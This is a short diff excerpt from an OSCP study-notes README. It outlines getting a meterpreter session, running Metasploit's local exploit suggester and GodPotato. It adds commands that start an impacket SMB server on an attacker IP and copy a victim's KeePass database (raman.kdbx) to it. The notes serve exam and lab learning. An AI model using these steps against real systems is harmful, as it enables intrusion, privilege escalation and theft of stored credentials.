AbdullahZuhair21/OSCP-Notes/README.md

 copy any paste the payload into the cmd shell. you should have a new session after getting the meterpreter session run post/multi/recon/local_exploit_suggester use any of the suggested exploits and run it
+- use godpotato

+Copy a file from windows to Linux by setting up smb server setup the smbserver
+-     impacket-smbserver raman `pwd` cd to the share
+-     cd \\10.10.16.13\raman
+-     cp c:\users\raman\raman.kdbx .
+-
 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Platforms
 1. for Initial Access work on eJPT, This article and official content